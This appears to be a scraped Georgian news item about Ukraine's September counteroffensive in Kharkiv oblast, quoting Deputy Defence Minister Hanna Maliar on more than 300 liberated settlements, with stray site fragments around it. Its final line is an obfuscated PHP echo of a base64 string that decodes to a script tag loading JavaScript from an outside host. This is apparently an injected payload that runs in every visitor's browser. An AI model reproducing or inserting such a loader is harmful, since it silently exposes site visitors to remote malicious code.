celsiusi
ავერსი საქკაბელი
უკრაინის არმიამ ფართომასშტაბიანი კონტრშეტევის დაწყებიდან სულ რამდენიმე დღეში გაათავისუფლა ხარკოვის ოლქში 300-ზე მეტი დასახლება  - ამის შესახებ ინფორმაციას უკრაინული მედია უკრაინის თავდაცვის მინისტრის მოადგილეზე ანა მალიარზე დაყრდნობით ავრცელებს.
 
"ხარკოვის ოლქის გათავისუფლების ოპერაცია, როგორც დაგეგმილი იყო, რამდენიმე დღე გაგრძელდა. 6 სექტემბრიდან დღემდე, 3 800 კვადრატული კილომეტრი და 300-ზე მეტი დასახლება გათავისუფლდა. 150 000-ზე მეტი უკრაინელი გათავისუფლდა ოკუპაციისგან, სადაც ისინი ფაქტობრივად მძევლები იყვნენ“, - ამბობს მალიარი
 
მალიარის თქმით, კონტრშეტევა გეგმის მიხედვით გრძელდება ხარკოვის ოლქის მთელი ტერიტორიის გათავისუფლებამდე.
398
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");